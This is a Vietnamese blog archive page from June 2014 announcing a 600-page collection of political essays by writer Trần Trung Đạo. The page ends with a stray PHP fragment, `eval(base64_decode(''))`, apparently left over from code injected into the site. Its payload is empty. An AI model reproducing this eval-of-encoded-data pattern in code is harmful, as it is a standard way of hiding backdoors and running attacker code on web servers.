Archive for June 12th, 2014

Giới thiệu Chính Luận Trần Trung Đạo

Giới thiệu Chính Luận Trần Trung Đạo

Chính luận Trần Trung Đạo là một tuyển tập luận văn chính trị dày 600 trang gồm 42 bài chọn lọc từ các bài viết của nhà văn Trần Trung Đạo trong nhiều năm qua. Tác phẩm do Cổ Loa xuất bản, Uyên Nguyên trình bày, công ty Amazon phát hàn

06.12.2014 | Tiểu Luận- Chính Luận |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>